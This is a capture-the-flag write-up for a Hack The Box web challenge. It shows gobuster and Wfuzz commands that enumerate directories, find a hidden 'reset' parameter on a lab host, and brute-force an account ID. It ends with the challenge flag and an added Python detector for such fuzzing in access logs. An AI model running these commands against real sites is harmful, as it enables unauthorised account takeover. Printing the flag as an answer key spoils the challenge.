Challenge By : Arrexel
Challenge Description : We have gained access to some infrastructure which we believe is connected to the internal network of our target. We need you to help obtain the administrator password for the website they are currently developing.
Points : 20
Author : Rehman S. Beg (HTB Profile : MrReh )
________________________________________
Let's start the instance and open the page; it looks like a normal web page.
Let's start with the gobuster command “gobuster dir -u http://docker.hackthebox.eu:30716/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50”
The “api” directory looks interesting, so let's run gobuster again to find files with some extensions.
We found action.php; let's see what we have on it.
So we need to find which parameters can be set and what values we can put in them.
To find them we can use the Wfuzz command “wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30713/api/action.php?FUZZ=test” (--hh=24 hides responses that are 24 characters long).
Now we have found our parameter, which is “reset”; let's see what this parameter gives us.
Now we have to brute-force the account ID.
Again we will use Wfuzz, but this time we will set the hidden character length to 27, with the command “wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30713/api/action.php?reset=FUZZ”
So we got the account ID; let's browse to it.
FLAG : “HTB{h0t_fuzz3r}”
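
From the defender's side, both Wfuzz stages above leave a clear pattern in the web server's access log: one client sending many distinct parameter names to action.php, then many distinct values for “reset”. The following is an added example, not part of the original write-up; the log format, the threshold, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Assumed log format: Apache/nginx "combined"-style access log lines.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} ')

def detect_fuzzing(lines, threshold=20):
    """Flag clients that enumerate parameter names or one parameter's values.

    threshold is an assumed tuning value: distinct names/values per client and path.
    """
    names = defaultdict(set)   # (client, path) -> distinct parameter names
    values = defaultdict(set)  # (client, path, name) -> distinct values
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, target = m.groups()
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            names[(client, url.path)].add(name)
            values[(client, url.path, name)].add(value)
    alerts = []
    for (client, path), seen in names.items():
        if len(seen) >= threshold:
            alerts.append((client, path, "parameter-name enumeration", len(seen)))
    for (client, path, name), seen in values.items():
        if len(seen) >= threshold:
            alerts.append((client, path, f"value enumeration of '{name}'", len(seen)))
    return sorted(alerts)

def constructed_log():
    """Constructed sample lines; addresses come from documentation ranges."""
    fmt = '{} - - [01/Jan/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 {}'
    noisy, normal = "198.51.100.7", "203.0.113.9"
    lines = [fmt.format(noisy, f"/api/action.php?word{i}=test", 24) for i in range(30)]
    lines += [fmt.format(noisy, f"/api/action.php?reset={i}", 27) for i in range(30)]
    lines += [fmt.format(normal, "/api/action.php?reset=5", 27),
              fmt.format(normal, "/index.html", 512)]
    return lines

if __name__ == "__main__":
    for alert in detect_fuzzing(constructed_log()):
        print(alert)
```

An alert of either kind is a reason to rate-limit the client and to check whether the endpoint answers unauthenticated requests with different bodies for valid and invalid input.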